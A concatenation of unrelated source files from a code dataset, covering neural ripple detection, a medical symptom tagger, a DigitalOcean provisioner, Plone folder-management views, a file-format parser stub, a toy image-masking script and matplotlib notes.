Excluding ripples whose length < minRipLen and greater than Maximum Ripple Length\nif len(start):\n\tl = (nSS.index.values[stop] - nSS.index.values[start])/1000 # from us to ms\n\tidx = np.logical_and(l > minRipLen, l < maxRipLen)\nelse:\t\n\tprint(\"Detection by threshold failed!\")\n\tsys.exit()\n\nrip_ep = nts.IntervalSet(start = nSS.index.values[start[idx]], end = nSS.index.values[stop[idx]])\n\n####################################################################################################################\n# Round 3 : Merging ripples if inter-ripple period is too short\nrip_ep = rip_ep.merge_close_intervals(minInterRippleInterval/1000, time_units = 's')\n\n\n\n#####################################################################################################################\n# Round 4: Discard Ripples with a peak power < high_thresFactor and > limit_peak\nrip_max = []\nrip_tsd = []\nfor s, e in rip_ep.values:\n\ttmp = nSS.loc[s:e]\n\trip_tsd.append(tmp.idxmax())\n\trip_max.append(tmp.max())\n\nrip_max = np.array(rip_max)\nrip_tsd = np.array(rip_tsd)\n\ntokeep = np.logical_and(rip_max > high_thresFactor, rip_max < limit_peak)\n\nrip_ep = rip_ep[tokeep].reset_index(drop=True)\nrip_tsd = nts.Tsd(t = rip_tsd[tokeep], d = rip_max[tokeep])\n\n\n# # t1, t2 = (6002729000,6003713000)\n# t1, t2 = (6002700000,6003713000)\n# figure()\n# ax = subplot(211)\n# plot(lfp.loc[t1:t2])\n# plot(signal.loc[t1:t2])\n# plot(lfp.restrict(rip_ep).loc[t1:t2], '.')\n# subplot(212,sharex = ax)\n# plot(nSS.loc[t1:t2])\n# axhline(low_thresFactor)\n# show()\n\n\n\n\n###########################################################################################################\n# Writing for neuroscope\n\nrip_ep\t\t\t= sws_ep.intersect(rip_ep)\t\nrip_tsd \t\t= rip_tsd.restrict(sws_ep)\n\nstart = rip_ep.as_units('ms')['start'].values\n# peaks = rip_tsd.as_units('ms').index.values\nends = rip_ep.as_units('ms')['end'].values\n\ndatatowrite = np.vstack((start,ends)).T.flatten()\n\nn = len(rip_ep)\n\ntexttowrite = np.vstack(((np.repeat(np.array(['PyRip start 1']), n)), \n\t\t\t\t\t\t# (np.repeat(np.array(['PyRip peak 1']), n)),\n\t\t\t\t\t\t(np.repeat(np.array(['PyRip stop 1']), n))\n\t\t\t\t\t\t\t)).T.flatten()\n\nevt_file = data_directory+'/'+data_directory.split('/')[-1]+'.evt.py.rip'\nf = open(evt_file, 'w')\nfor t, n in zip(datatowrite, texttowrite):\n\tf.writelines(\"{:1.6f}\".format(t) + \"\\t\" + n + \"\\n\")\nf.close()\t\t\n\n\n\n\n","sub_path":"python/main_A14_detect_ripples.py","file_name":"main_A14_detect_ripples.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"368391115","text":"\"\"\"Get data from event.\"\"\"\nimport typing\n\nimport numpy\nfrom numpy import ndarray\n\n\ndef get_image_from_event(\n event: typing.Dict[str, typing.Any],\n det_name: str\n) -> numpy.ndarray:\n \"\"\"Read the image data from the event. It will be transferred to a numpy array.\n\n Parameters\n ----------\n event :\n The event document.\n\n det_name :\n The name of the key to the image. Usually, the detector name.\n\n Returns\n -------\n img :\n The two dimensional array of image.\n \"\"\"\n data = event['data'][det_name]\n return squeeze_to_image(data)\n\n\ndef squeeze_to_image(\n arr: typing.Union[list, ndarray],\n ndim: int = 2\n) -> ndarray:\n \"\"\"Squeez the array to a 2d image array.\"\"\"\n arr1 = numpy.asarray(arr)\n img = numpy.squeeze(arr1)\n if img.ndim != ndim:\n raise ValueError(\"Invalid image dimension. Expect {} but this is {}\".format(ndim, img.ndim))\n return img\n","sub_path":"pdfstream/callbacks/from_event.py","file_name":"from_event.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"22579538","text":"# -*- encoding:utf-8 -*-\n'''\n input: 一段需要分词的文本\n output: 结果更新于文件夹 temp/result_symptomDic.json --- 症状对应的位置【json格式】\n'''\nimport re\nimport subprocess\nimport sys\n\n\nROOT = '/nlp_api_ubuntu'\n\n\ndef read_lines(path):\n all_lines = []\n with open(path, 'r', encoding='utf-8') as file:\n temp_lines = file.readlines()\n for line in temp_lines:\n line = line.strip()\n if line:\n all_lines.append(line)\n return all_lines\n\n\ndef set_dta(keywords):\n p = []\n for word in keywords:\n ln = len(word)\n char = word[ln-1]\n if not (char in p):\n p.append(char)\n p = set(p)\n return p\n\n\npattern_sub= re.compile(' ')\ndef Dictest(line, view_dict_set,keywords):\n \n # 字典特征提取(采用倒序搜索算法)\n newline_flag = ('。', '!', '?')\n if line[-1] not in newline_flag:\n line = line + '。'\n line = pattern_sub.sub('_',line) # '_'替换空格等\n \n aresult = '/temp/test_Dic'\n fa = open(ROOT + aresult,'w',encoding='utf-8')\n word = []\n dic = []\n for w in line:\n word.append(w)\n dic.append('O') \n ln = len(word)\n i = ln\n j = 0\n le = []\n while i-j > 0:\n t = ''.join(word[i-1:i])\n if not (t in view_dict_set):\n j = 0\n i -= 1\n continue\n for k in range(1,min(10,ln+1)):\n if ''.join(word[i-k:i]) in keywords:\n le.append(k)\n if len(le) == 0:\n i = i-1\n if len(le) > 0:\n if len(le) == 1:\n if le[0] == 1:\n dic[i-1]='S-CAR'\n continue\n else:\n dic[i-le[0]]='B-CAR'\n for h in range(i-le[0]+1,i-1,1):\n dic[h]='I-CAR'\n dic[i-1]='E-CAR'\n i = i-le[0]\n le = []\n continue\n if len(le) == 2:\n if le[1] == 1:\n dic[i-1]='S-CAR'\n continue\n else:\n dic[i-le[1]]='B-CAR'\n for h in range(i-le[1]+1,i-1,1):\n dic[h]='I-CAR'\n dic[i-1]='E-CAR'\n i = i-le[1]\n le = []\n continue\n if len(le) > 2:\n if le[2] == 1:\n dic[i-1]='S-CAR'\n continue\n else:\n dic[i-le[2]]='B-CAR'\n for h in range(i-le[2]+1,i-1,1):\n dic[h]='I-CAR'\n dic[i-1]='E-CAR'\n i = i-le[2]\n le = []\n continue\n for m in range(len(word)):\n fa.write(word[m]+'\\t'+dic[m]+'\\n')\n fa.write('\\n')\n word = []\n dic = []\n\n\n\n#def crf_prodict():\n# # linux\n# crf_test_exe = sys.path[0]+'./crf_tool/crf_test '\n# model = ' -m '+sys.path[0]+'./model/Dic_model'\n# #进行测试\n# test = ' '+sys.path[0]+'./temp/test_Dic'\n# output = ' '+sys.path[0]+'./temp/test_Dic_Result'\n# process = subprocess.Popen(crf_test_exe + model +test + ' >' + output, shell=True)\n# process.wait() # 堵塞式\ndef crf_prodict():\n# # win\n# crf_test_exe = r'.\\crf_tool\\crf_test '\n# model = r' -m .\\model\\Dic_model'\n# #进行测试\n# test = r' .\\temp\\test_Dic'\n# output = r' .\\temp\\test_Dic_Result'\n# process = subprocess.Popen(crf_test_exe + model +test + ' >' + output, shell=True)\n# process.wait() # 堵塞式\n print('into function crf_predict') \n model = ROOT + '/model/Dic_model'\n #进行测试\n test = ROOT + '/temp/test_Dic'\n output = ROOT + '/temp/test_Dic_Result'\n #tagger = CRFPP.Tagger(\"/opt/CRF++-0.58/crf_test\"+\" -m \" + model)\n #crf_segmenter(test, output, tagger)\n try:\n process = subprocess.Popen(\"/usr/local/bin/crf_test -m\" + model + ' ' + test + ' > ' + output, shell=True)\n process.wait() # 堵塞式\n print('crf++ succeed')\n except:\n print('crf++ failed')\n\n\n\ndef toJson():\n fout=open(ROOT + '/temp/result_symptomDic.json','w',encoding='utf-8')\n index=0\n fout.write('[')\n \n fin=open(ROOT + '/temp/test_Dic_Result','r',encoding='utf-8')\n Tlist=[]\n view=[]\n lines=fin.readlines()\n for line in lines:\n if line.strip():\n tag=line.strip().split()[2]\n Tlist.append(tag)\n SE = []\n for i in range(len(Tlist)):\n if Tlist[i] == 'S-CAR':\n SE.append(i)\n SE.append(i)\n view.append(SE)\n #index += 1\n SE = []\n if Tlist[i] == 'B-CAR':\n SE.append(i)\n if Tlist[i] == 'E-CAR':\n SE.append(i)\n view.append(SE)\n SE = []\n index+=len(view)\n fout.write('{\"View\":%s'%str(view)+'}')\n fout.write(']')\n fout.close()\n\ndef init(text):\n try:\n fVar = open(ROOT + '/dict/symptom.txt','r',encoding='utf-8')\n keywords = []\n ViewLines = fVar.readlines()\n for line in ViewLines:\n if line.strip():\n word = line.strip()\n keywords.append(word)\n \n view_dict_set = set_dta(keywords)\n Dictest(text, view_dict_set, keywords)\n crf_prodict() ## CRF++预测结果更新\n toJson()\n return 1\n except:\n return 0\nif __name__ == '__main__':\n \n \n text = '患者腹胀较前减轻,咳嗽,咳痰,量少色白,质稀,发热,乏力好转,胃纳一般,二便调,夜寐尚可。查体:全身皮肤粘膜轻度黄染,无瘀斑瘀点,全身浅表淋巴结未扪及肿大,蜘蛛痣(+),肝掌(+)。巩膜黄染,腹膨隆,全腹无明显压痛、反跳痛、肌卫,肝肋下未及,脾脏肿大平脐,肝肾区叩痛(-),麦氏征(-),莫氏征(-),移动性浊音(+),肠鸣音不亢。四肢脊柱无红肿畸形,双下肢水肿。患者水肿较前加重,增加利尿剂剂量为速尿40mg qdpo,安体舒通80mg qdpo。补液后予拖拉塞米20mg 静推利尿减轻水肿。患者今晨发热38℃,咳嗽,咳痰,量少色白,质稀,予NS100ml+海西丁3.0g bid ivgtt抗感染,今补充诊断:肺部感染。患者舌红,苔黄腻,脉弦细予荆银合剂2瓶疏风清热。明晨急查血培养st!。患者尿常规示红细胞++,请肾病科会诊协助诊治。余治同前,继观。'\n \n print(init(text))\n\n\n\n","sub_path":"init_text_similar.py","file_name":"init_text_similar.py","file_ext":"py","file_size_in_byte":6574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"645326303","text":"# Copyright Hybrid Logic Ltd. See LICENSE file for details.\n\n\"\"\"\nDigitalOcean provisioner.\n\"\"\"\nimport time\nfrom functools import partial\n\nfrom ._libcloud import LibcloudProvisioner\nfrom ._install import (\n provision,\n task_install_digitalocean_kernel, DIGITALOCEAN_KERNEL,\n task_open_control_firewall\n)\nfrom ._common import Kernel\nfrom ._ssh import run_remotely\nfrom effect import Effect, Func\nfrom ._effect import sequence\n\n\ndef retry_on_error(error_checkers, callable, *args, **kwargs):\n \"\"\"\n This function repeats the API call if it raises an exception and if that\n exception is validated by any of the supplied checkers.\n It returns the result if the call eventually succeeds.\n\n :param error_checkers: A ``list`` of ``callables`` which will check for\n expected exceptions.\n :param callable: The API function to call.\n :param args: Positional arguments to supply when calling it.\n :param kwargs: Keyword arguments to supply when calling it.\n :return: The result of calling ``callable``.\n \"\"\"\n start_time = time.time()\n time_limit = 60\n while True:\n try:\n result = callable(*args, **kwargs)\n except Exception as e:\n for checker in error_checkers:\n if checker(e):\n # Checker matched go to sleep or time out\n break\n else:\n # None of the error_checkers matched.\n raise\n\n if time.time() - start_time < time_limit:\n time.sleep(1)\n else:\n raise Exception(\n 'Timed out waiting for successful API call. '\n 'Exception: {!r}, '\n 'Time Limit: {!r}s '.format(e, time_limit)\n )\n else:\n return result\n\n\ndef pending_event(exception):\n \"\"\"\n Check for a pending event exception.\n\n DigitalOceanV2 API only allows one change at a time and returns HTTP code\n 402 if another change is already pending.\n\n So this function repeats the API call if that error code is received and\n returns the result if the call eventually succeeds.\n\n The raw DO API returns ``event``s whose status can be queried, and that\n would be a better way to block before issuing the next API call, but\n pyocean doesn't consistently return the event info. E.g. droplet.create\n returns a ``droplet`` instance instead whose status is difficult to check.\n\n See https://digitalocean.uservoice.com/forums/136585-digitalocean/suggestions/4842992-allow-api-cal # noqa\n\n :param Exception exception: The exception that will be checked for type and\n message\n :return: ``True`` if ``exception`` matches else ``False``.\n \"\"\"\n # Import here, so that this can be added to ``flocker.provision`` without\n # having to install ``pyocean``.\n import pyocean\n\n if isinstance(exception, pyocean.exceptions.ClientError):\n if exception.message == 'Droplet already has a pending event.':\n return True\n return False\n\n\ndef droplet_still_on(exception):\n \"\"\"\n Check for a droplet still on exception.\n\n Shutdown returns the following event, indicating that the\n droplet has halted.\n\n {u'completed_at': u'2015-01-15T20:52:36Z',\n u'id': 41364967,\n u'region': u'ams3',\n u'resource_id': 3797602,\n u'resource_type': u'droplet',\n u'started_at': u'2015-01-15T20:52:31Z',\n u'status': u'completed',\n u'type': u'shutdown'}\n\n But it still seems to require some time before powering on, so catch the\n \"currently on\" exception and retry in that case.\n\n :param Exception exception: The exception that will be checked for type and\n message\n :return: ``True`` if ``exception`` matches else ``False``.\n \"\"\"\n # Import here, so that this can be added to ``flocker.provision`` without\n # having to install ``pyocean``.\n import pyocean\n\n if (isinstance(exception, pyocean.exceptions.ClientError)\n and exception.message == ('Droplet is currently on. '\n 'Please power it off to run this event.')):\n return True\n return False\n\n\ndef kernel_from_digitalocean_version(version):\n \"\"\"\n Parse a DigitalOcean kernel version string into its component parts.\n\n :param bytes version: The DigitalOcean kernel version string.\n :return: ``Kernel`` with version information.\n \"\"\"\n version, remaining = version.split('-', 1)\n release, distribution, architecture = remaining.split('.', 2)\n return Kernel(\n version=version,\n release=release,\n distribution=distribution,\n architecture=architecture\n )\n\n\nDIGITAL_OCEAN_KERNEL_VERSION_TEMPLATE = (\n '{version}-{release}.{distribution}.{architecture}'\n)\n\n\ndef kernel_to_digitalocean_version(kernel):\n \"\"\"\n Return a DigitalOcean style kernel string for the supplied ``Kernel``.\n\n :param Kernel kernel: The ``Kernel`` from which to get attributes for\n filling the template.\n :returns: A ``bytes`` DigitalOcean kernel label.\n \"\"\"\n return DIGITAL_OCEAN_KERNEL_VERSION_TEMPLATE.format(\n version=kernel.version,\n release=kernel.release,\n distribution=kernel.distribution,\n architecture=kernel.architecture\n )\n\n\ndef get_droplet_kernel(droplet, required_kernel):\n \"\"\"\n Search a droplet for a certain kernel and return a ``pyocean.Kernel`` which\n can then be used to reset the droplet's kernel.\n\n :param Kernel required_kernel: The kernel version to search for.\n :returns: A ``pyocean.Kernel`` instance corresponding to the supplied\n ``required_kernel``.\n \"\"\"\n full_version = kernel_to_digitalocean_version(required_kernel)\n for do_kernel in droplet.get_available_kernels():\n if do_kernel.version == full_version:\n return do_kernel\n else:\n raise ValueError('Unknown kernel', required_kernel)\n\n\ndef latest_droplet_kernel(droplet,\n required_distribution, required_architecture):\n \"\"\"\n Return the newest kernel available for the supplied droplet, with the given\n distribution and architecture.\n\n :param required_distribution: Only look for kernels for this distribution.\n :param required_architecture: Only look for kernels for this architecture.\n :return: A ``Kernel`` with the latest version information.\n \"\"\"\n matching_kernels = []\n for do_kernel in droplet.get_available_kernels():\n kernel = kernel_from_digitalocean_version(do_kernel.version)\n\n if ((required_distribution,\n required_architecture) == (kernel.distribution,\n kernel.architecture)):\n matching_kernels.append(kernel)\n\n if not matching_kernels:\n raise ValueError(\n 'No kernels for required distribution and architecture',\n required_distribution, required_architecture)\n\n latest_kernel = sorted(\n matching_kernels,\n key=lambda kernel: (kernel.version_tuple, kernel.release),\n reverse=True)[0]\n\n return latest_kernel\n\n\ndef change_kernel(node_id, token, kernel_version):\n \"\"\"\n Change the configured kernel on a DigitalOcean node.\n\n :param bytes node_id: The id of the DigitalOcean.\n :param bytes token: A DigitalOcean v2 API token.\n \"\"\"\n # Import here, so that this can be added to ``flocker.provision`` without\n # having to install ``pyocean``.\n import pyocean\n v2client = pyocean.DigitalOcean(access_token=token)\n v2droplet = v2client.droplet.get(node_id)\n do_kernel = get_droplet_kernel(v2droplet, kernel_version)\n\n retry_on_error(\n [pending_event],\n v2droplet.change_kernel, do_kernel.id)\n\n\ndef hard_reboot(node_id, token):\n \"\"\"\n Reboot a DigitalOcean node by powering it off and then back on.\n This is necessary for a new kernel to be selected.\n\n :param bytes node_id: The id of the DigitalOcean.\n :param bytes token: A DigitalOcean v2 API token.\n \"\"\"\n # Import here, so that this can be added to ``flocker.provision`` without\n # having to install ``pyocean``.\n import pyocean\n v2client = pyocean.DigitalOcean(access_token=token)\n v2droplet = v2client.droplet.get(node_id)\n\n # Libcloud doesn't support shutting down DO vms.\n # See https://issues.apache.org/jira/browse/LIBCLOUD-655\n retry_on_error(\n [pending_event],\n v2droplet.shutdown)\n\n # Libcloud doesn't support powering up DO vms.\n # See https://issues.apache.org/jira/browse/LIBCLOUD-655\n # Even after the shutdown, the droplet may not be quite ready to power on,\n # so also check for that resulting error here.\n retry_on_error([pending_event, droplet_still_on], v2droplet.power_on)\n\n\ndef provision_digitalocean(node, token,\n package_source, distribution, variants):\n \"\"\"\n Provision Flocker on this node.\n\n :param LibcloudNode node: The node to be provisioned.\n :param PackageSource package_source: The URL of the distribution package\n repository.\n :param bytes distribution: The label of the distribution to be installed on\n the node.\n :param bytes token: A DigitalOcean v2 API token.\n :param set variants: The set of variant configurations to use when\n provisioning\n \"\"\"\n # DO doesn't support booting the droplet's own kernel.\n # * http://digitalocean.uservoice.com/forums/136585-digitalocean/suggestions/2814988-give-option-to-use-the-droplet-s-own-bootloader # noqa\n # So rather than upgrade, we'll need to have new task to install the kernel\n # package (and headers) for the DO supported kernel.\n # The Fedora droplet default is to use a kernel that's too old for our\n # purposes.\n # Our documentation describes how to select a newer (DO supported) kernel\n # for this droplet.\n # Unfortunately this operation is only supported in the DO v2 API.\n # * http://digitalocean.uservoice.com/forums/136585-digitalocean/suggestions/5618546-add-the-ability-to-change-kernel-via-api # noqa\n # * https://developers.digitalocean.com/#change-the-kernel\n # But libcloud only supports the DO v1 API\n # * https://www.digitalocean.com/community/questions/does-libcloud-work-with-digitalocean-s-v2-api # noqa\n # * https://issues.apache.org/jira/browse/JCLOUDS-613\n\n return sequence([\n # Change the configured kernel\n Effect(Func(\n lambda: change_kernel(node._node.id, token, DIGITALOCEAN_KERNEL)\n )),\n # Install the corresponding kernel package.\n run_remotely(\n username='root',\n address=node.address,\n commands=task_install_digitalocean_kernel()\n ),\n # Hard reboot the machine to boot into the new kernel.\n Effect(Func(\n lambda: hard_reboot(node._node.id, token)\n )),\n # Finally run all the standard Fedora20 installation steps.\n run_remotely(\n username='root',\n address=node.address,\n commands=sequence([\n provision(\n package_source=package_source,\n distribution=node.distribution,\n variants=variants,\n ),\n # https://clusterhq.atlassian.net/browse/FLOC-1550\n # This should be part of ._install.configure_cluster\n task_open_control_firewall()\n ]),\n ),\n ])\n\n\nIMAGE_NAMES = {\n # It'd be better to use image ID here, but the following code is currently\n # written to lookup image names...which would normally be good for\n # readability but which in the case DigitalOcean are pretty meaningless.\n 'fedora-20': '20 x64',\n}\n\n\ndef location_by_slug(driver, location_slug):\n \"\"\"\n Look up a DigitalOcean location by its short human readable \"slug\" code.\n\n # XXX: ``libcloud.DigitalOceanDriver.list_locations`` discards the slug\n # so we make a direct call to the v1 API and parse the returned dictionary.\n # See https://issues.apache.org/jira/browse/LIBCLOUD-653\n\n :param driver: The libcloud driver to query for sizes.\n :param bytes location_slug: A DigitalOcean location \"slug\".\n :returns: ``NodeLocation``.\n \"\"\"\n result = driver.connection.request('/regions')\n for location_dict in result.object['regions']:\n if location_dict['slug'] == location_slug:\n break\n else:\n raise ValueError(\"Unknown location slug.\", location_slug)\n\n return driver._to_location(location_dict)\n\n\ndef size_by_slug(driver, size_slug):\n \"\"\"\n Look up a DigitalOcean size by its short human readable \"slug\" code.\n\n # XXX: ``libcloud.DigitalOceanDriver.list_sizes`` discards the slug\n # so we make a direct call to the v1 API and parse the returned dictionary.\n # See https://issues.apache.org/jira/browse/LIBCLOUD-654\n\n :param driver: The libcloud driver to query for sizes.\n :param bytes size_slug: A DigitalOcean size \"slug\".\n :returns: ``NodeSize``.\n \"\"\"\n result = driver.connection.request('/sizes')\n for size_dict in result.object['sizes']:\n if size_dict['slug'] == size_slug:\n return driver._to_size(size_dict)\n else:\n raise ValueError(\"Unknown size slug.\", size_slug)\n\n\ndef ssh_key_by_name(driver, ssh_key_name):\n \"\"\"\n Return the ``SSHKey`` with the given name.\n\n :param DigitalOceanDriver driver: The driver to use for issuing queries.\n :param bytes ssh_key_name: The name of a registered SSH key.\n :returns: ``SSHKey``\n \"\"\"\n for ssh_key in driver.ex_list_ssh_keys():\n if ssh_key.name == ssh_key_name:\n return ssh_key\n else:\n raise ValueError(\"Unknown SSH key name.\", ssh_key_name)\n\n\ndef digitalocean_provisioner(client_id, api_key, token, location, keyname):\n \"\"\"\n Create a LibCloudProvisioner for provisioning nodes on DigitalOcean.\n\n :param bytes client_id: A V1 API client ID.\n :param bytes api_key: A V1 API key.\n :param bytes token: A V2 API token.\n :param bytes location: The slug for the location in which new nodes will be\n created.\n :param bytes keyname: The name of an existing ssh public key configured in\n DigitalOcean. The provision step assumes the corresponding private key\n is available from an agent.\n \"\"\"\n # Import these here, so that this can be imported without\n # installing libcloud.\n from libcloud.compute.providers import get_driver, Provider\n\n driver_factory = get_driver(Provider.DIGITAL_OCEAN)\n driver = driver_factory(key=client_id, secret=api_key)\n ssh_key = ssh_key_by_name(driver, keyname)\n size = size_by_slug(driver, \"8gb\")\n\n def create_arguments(disk_size):\n \"\"\"\n :param int disk_size: Unused. DigitalOcean doesn't support arbitrary\n disk sizes.\n \"\"\"\n return {\n \"location\": location_by_slug(driver, location),\n # XXX: DigitalOcean driver doesn't use the standard ex_keyname\n # See https://clusterhq.atlassian.net/browse/FLOC-1228\n \"ex_ssh_key_ids\": [str(ssh_key.id)]\n }\n\n provisioner = LibcloudProvisioner(\n driver=driver,\n keyname=keyname,\n image_names=IMAGE_NAMES,\n create_node_arguments=create_arguments,\n # Tack the token on here because its not a standard part of the API.\n provision=partial(provision_digitalocean, token=token),\n default_size=size.id,\n )\n\n return provisioner\n","sub_path":"flocker/provision/_digitalocean.py","file_name":"_digitalocean.py","file_ext":"py","file_size_in_byte":15468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"624222789","text":"#!/usr/bin/env python2\n\nimport sys\nimport struct\nimport datetime\n\n# You can use this method to exit on failure conditions.\ndef bork(msg):\n sys.exit(msg)\n\n\n# Some constants. You shouldn't need to change these.\nMAGIC = 0xdeadbeef\nVERSION = 1\n\nif len(sys.argv) < 2:\n sys.exit(\"Usage: python2 stub.py input_file.fpff\")\n\n# Normally we'd parse a stream to save memory, but the FPFF files in this\n# assignment are relatively small.\nwith open(sys.argv[1], 'rb') as fpff:\n data = fpff.read()\n\n# Hint: struct.unpack will be VERY useful.\n# Hint: you might find it easier to use an index/offset variable than\n# hardcoding ranges like 0:8\nmagic, version, timestamp, author, section_count = struct.unpack(\"\n{% for (var i=0, file; file=o.files[i]; i++) { %}\n \n \n {%=file.name%}\n {%=o.formatFileSize(file.size)%}\n {% if (file.error) { %}\n \n \n {%=locale.messagefactory(locale.fileupload.error)%}\n {%=locale.messagefactory(locale.fileupload.errors[file.error]) || file.error%}\n \n {% } else if (o.files.valid && !i) { %}\n \n
\n \n {% if (!o.options.autoUpload) { %}\n \n {% } %}\n {% } else { %}\n \n {% } %}\n {% if (!i) { %}\n \n {% } %}\n \n{% } %}\n\n\n\n\"\"\"\n\n\ndef getOrdering(context):\n if IPloneSiteRoot.providedBy(context):\n return context\n else:\n ordering = context.getOrdering()\n if not IExplicitOrdering.providedBy(ordering):\n return None\n return ordering\n\n\nclass Move(BrowserView):\n def __call__(self):\n ordering = getOrdering(self.context)\n authenticator = getMultiAdapter((self.context, self.request),\n name=u\"authenticator\")\n if not authenticator.verify() or \\\n self.request['REQUEST_METHOD'] != 'POST':\n raise Unauthorized\n\n action = self.request.form.get('action')\n itemid = self.request.form.get('itemid')\n if action == 'movetop':\n ordering.moveObjectsToTop([itemid])\n elif action == 'movebottom':\n ordering.moveObjectsToBottom([itemid])\n elif action == 'movedelta':\n ordering.moveObjectsByDelta([itemid],\n int(self.request.form['delta']))\n return 'done'\n\n\nclass Sort(BrowserView):\n def __call__(self):\n authenticator = getMultiAdapter((self.context, self.request),\n name=u\"authenticator\")\n if not authenticator.verify() or \\\n self.request['REQUEST_METHOD'] != 'POST':\n raise Unauthorized\n ordering = getOrdering(self.context)\n catalog = getToolByName(self.context, 'portal_catalog')\n brains = catalog(path={\n 'query': '/'.join(self.context.getPhysicalPath()),\n 'depth': 1\n }, sort_on=self.request.form.get('on'))\n if self.request.form.get('reversed'):\n brains = [b for b in reversed(brains)]\n for idx, brain in enumerate(brains):\n ordering.moveObjectToPosition(brain.id, idx)\n self.request.response.redirect(\n '%s/folder_contents' % self.context.absolute_url())\n\n\nclass JUpload(BrowserView):\n \"\"\" We only support two kind of file/image types, AT or DX based (in case\n that p.a.contenttypes are installed ans assuming their type names are\n 'File' and 'Image'.\n \"\"\"\n def __call__(self):\n authenticator = getMultiAdapter((self.context, self.request),\n name=u\"authenticator\")\n if not authenticator.verify() or \\\n self.request['REQUEST_METHOD'] != 'POST':\n raise Unauthorized\n filedata = self.request.form.get(\"files[]\", None)\n if filedata is None:\n return\n filename = filedata.filename\n content_type = mimetypes.guess_type(filename)[0] or \"\"\n\n if not filedata:\n return\n\n # Determine if the default file/image types are DX or AT based\n ctr = getToolByName(self.context, 'content_type_registry')\n type_ = ctr.findTypeName(filename.lower(), '', '') or 'File'\n\n DX_BASED = False\n if HAS_DEXTERITY:\n pt = getToolByName(self.context, 'portal_types')\n if IDexterityFTI.providedBy(getattr(pt, type_)):\n factory = IDXFileFactory(self.context)\n DX_BASED = True\n else:\n factory = IATCTFileFactory(self.context)\n else:\n factory = IATCTFileFactory(self.context)\n\n obj = factory(filename, content_type, filedata)\n\n if DX_BASED:\n if 'File' in obj.portal_type:\n size = obj.file.getSize()\n content_type = obj.file.contentType\n elif 'Image' in obj.portal_type:\n size = obj.image.getSize()\n content_type = obj.image.contentType\n\n result = {\n \"url\": obj.absolute_url(),\n \"name\": obj.getId(),\n \"type\": content_type,\n \"size\": size\n }\n else:\n try:\n size = obj.getSize()\n except AttributeError:\n size = obj.getObjSize()\n\n result = {\n \"url\": obj.absolute_url(),\n \"name\": obj.getId(),\n \"type\": obj.getContentType(),\n \"size\": size\n }\n\n if 'Image' in obj.portal_type:\n result['thumbnail_url'] = result['url'] + '/@@images/image/tile'\n\n return json.dumps({\n 'files': [result]\n })\n","sub_path":"wildcard/foldercontents/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"339773111","text":"import cv2\nimport numpy as np\nimport random\nimport pickle\nimport sys\n\nq = 829\t\t\t\t\t\t\t# prime number < 1.84467 * 10^10\n\nfilename = sys.argv[1]\n\nimarr = cv2.imread(filename)\t# array generation\n\n\nwupper = 10**9\t\t\t\t\t# upper limit of w\nwlower = 10\t\t\t\t\t\t# lower limit of w\nsh = imarr.shape\n\nimarr = imarr.astype('uint64')\n\nfor i in range(sh[0]):\n\tfor j in range(sh[1]):\n\t\tfor k in range(sh[2]):\n\t\t\tw = random.randint(wlower, wupper)\n\t\t\tt =np.asarray(w*q)\n\t\t\tt = t.astype('uint64')\n\t\t\timarr[i][j][k] += t\n\npickle.dump(imarr, open(\"encrypted.bin\", 'wb'))","sub_path":"prototype/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"95793681","text":"# coding=utf-8\n# gallery: https://matplotlib.org/gallery.html\n\n#**************************************************\n# plt 各组件说明图: 是用代码画出来的\n# https://matplotlib.org/examples/showcase/anatomy.html\n#**************************************************\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nplt.style.use('ggplot')\nplt.figure(figsize=(12,12))\n\n#**************************************************\n# 第一种:基于MATLAB并使用基于状态的接口\n#**************************************************\nhelp(plt.figure)\n# 开始:第一张画布 figure----------------------------------------------------------------\nplt.figure(num=1,figsize=(12, 6))\nplt.subplot(211) # 第一张画布中的第一个图层\nplt.title('具体画图在下面')\nplt.subplot(212) # 第一张画布中的第二个图层\nplt.plot([4, 5, 6])\n\n# 开始:第二张画布 figure----------------------------------------------------------------\nplt.figure(2)\nplt.plot([4, 5, 6]) # 默认创建图层subplot(111)\n\n# 切换到:第一张画布 figure----------------------------------------------------------------\nplt.figure(1) # 切换到画布figure 1 ; 此时画布figure1的图层subplot(212)是当前活动图层\nplt.subplot(211) # 令图层subplot(211)成为figure1的当前活动图层\nx = np.arange(9)\ny = np.sin(x)\nz = np.cos(x)\nplt.plot(x, y, marker=\"*\", linewidth=3, linestyle=\"--\", color=\"orange\") # marker数据点样式,linewidth线宽,linestyle线型样式,color颜色\nplt.plot(x, z)\nplt.title(\"matplotlib\")\nplt.xlabel(\"height\")\nplt.ylabel(\"width\")\nplt.legend([\"Y\",\"Z\"], loc=\"upper right\") # 设置图例\nplt.grid(True)\n\n\n#**************************************************\n# 第二种:面向对象的接口,,,, fig 和 ax 分开创建建立,主要是为了获得代码提示\n#**************************************************\nfig = plt.figure(num=1,figsize=(8, 8))\nax = fig.add_subplot(2, 1, 1, aspect=1 , facecolor='r' , projection='polar')\n# ax = fig.add_subplot(211, aspect=1 , facecolor='r' , projection='polar') # 和上面等价\n\nax.plot(x=None,y=None) # 折线图\nax.scatter(x=None,y=None) # 散点图\nax.bar(x=None,height=None) # 柱形图\nax.pie(x=None) # 饼图\nax.hist(x=None,bins=None) # 直方图\n\nfig.set_\nax.set_\n\n\n#**************************************************\n# 第2.1种(附):面向对象的接口,,,, fig 和 axes 可以一次性创建,但没有了代码提示\n#**************************************************\nfig , axes = plt.subplots(nrows=2,ncols=1,sharex=True,sharey=False) #type:matplotlib.figure.Figure,np.array\nfig.subplots_adjust(left=0.1 ,right=0.95 ,top=0.9 ,bottom=0.1 ,wspace=0.3 ,hspace=0.3)\naxes[0].set_facecolor('skyblue')\n\n\n#**************************************************\n# 